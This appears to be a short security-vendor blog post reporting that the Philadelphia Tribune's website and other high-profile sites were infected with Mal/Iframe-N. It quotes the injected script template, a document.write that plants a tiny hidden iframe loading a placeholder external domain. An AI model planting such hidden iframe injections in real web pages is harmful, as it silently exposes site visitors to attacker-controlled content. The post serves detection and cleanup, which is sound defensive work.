Mal/Iframe-N: The website of the Philadelphia Tribune, a popular newspaper, infected

The Philadelphia Tribune has been infected with the same malware as was reported on the US Treasury site earlier this week. Detection for Mal/Iframe-N was updated yesterday to detect this threat.

Overnight several high profile sites (including a major NHL website) have been seen hosting this new version of Mal/Iframe-N which instead of having a plain Iframe (see blog) is injected via a script tag containing a document.write.

document.write('<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> where N is a small number.

This particular incarnation of Mal/Iframe-N is sneaky in that it doesn’t always appear when you visit the site so the site may appear clean.

Typically, this malware is installed via compromised access details. So we would recommend that web admins change all access details while cleaning this threat.